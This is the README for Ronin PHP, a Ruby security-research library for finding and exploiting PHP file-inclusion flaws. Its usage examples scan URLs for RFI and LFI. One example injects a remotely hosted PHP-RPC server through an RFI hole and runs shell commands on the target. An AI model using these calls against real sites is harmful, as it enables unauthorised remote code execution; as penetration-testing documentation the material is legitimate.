Ronin PHP is a Ruby library for Ronin that provides support for PHP related security tasks.

Ronin is a Ruby platform for exploit development and security research. Ronin allows for the rapid development and distribution of code, exploits or payloads over many common Source-Code-Management (SCM) systems.

Ruby

Extend

Publish

• Provides tests for Location File Inclusion (LFI) and Remote File Inclusion (RFI) that are built into the URI::HTTP class.
• Allows for effortless finger-printing of a web-server using LFI.
• Provides a PHP-RPC client and server that are designed to work in hostile environments.
• Provides an AJAX PHP-RPC Console.

• Start the Ronin console with Ronin PHP preloaded:

  $ ronin-php

• Test for Remote File Inclusion (RFI):

  require 'ronin/php/rfi'
  
  url = URI('http://www.example.com/page.php?lang=en')
  url.has_rfi?
  # => true

• Get the first viable RFI vulnerability:

  url.first_rfi
  # => #<Ronin::PHP::RFI: ...>

• Scan a URL for RFI vulnerabilities:

  url.rfi_scan
  # => [#<Ronin::PHP::RFI: ...>, ...]

• Inject a PHP-RPC Server into a RFI vulnerable URL:

  require 'ronin/rpc/php'
  
  client = url.rfi.rpc
  client.exec('whoami')
  # => "www-data"

• Get a direct URL to the AJAX interface of the PHP-RPC Server:

  client.url
  # => "http://www.example.com/page.php?en=http://ronin.rubyforge.org/static/ronin/php/rpc/server.min.php?"

• Test for Local File Inclusion (LFI):

  require 'ronin/php/lfi'
  
  url = URI('http://www.example.com/site.php?page=home')
  url.has_lfi?
  # => true

• Get the first viable LFI vulnerability:

  url.first_lfi
  # => #<Ronin::PHP::LFI: ...>

• Scan a URL for LFI vulnerabilities:

  url.lfi_scan
  # => [#<Ronin::PHP::LFI: ...>, ...]

• Ronin >= 0.3.0
• Ronin Web >= 0.2.0

$ sudo gem install ronin-php

• API Documentation
• Source Code
• Issue Tracker